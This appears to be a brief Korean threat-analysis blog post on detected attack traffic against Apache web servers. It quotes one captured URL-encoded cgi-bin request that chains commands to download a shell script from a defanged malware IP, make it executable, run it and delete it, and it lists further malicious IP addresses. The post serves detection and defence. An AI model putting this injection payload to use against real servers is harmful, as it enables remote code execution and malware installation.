반응형 아파치 웹 서비스 공격 탐지 분석 자료1 아파치 웹 서비스 공격 탐지 분석 자료 아파치 웹 서비스 공격 탐지 분석 자료웹 서비스 관련 악성 트래픽IP/Port 스캐닝 행위 및 C&C 서버를 통한 추가 악성 행위 가능탐지 트래픽[Target IP]:80/cgi-bin/;cd+%2Ftmp%3Bwget+http%3A%2F%2F 45[.]95[.]55[.]214%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+Netgear%3Brm+-rf+wget.sh- Apache/cgi-bin 디렉토리에 보관된 스크립트 활용- cd, wget [C&C IP], chmod 등 command를 통한 악성파일 다운로드&실행- 45[.]95[.]55[.]214 IP는 Malware와 관련된 IP로 알려져 있음악성 IP195.178.120[.]33195.178.120[.]41.. 2024. 9. 23. 이전 1 다음 반응형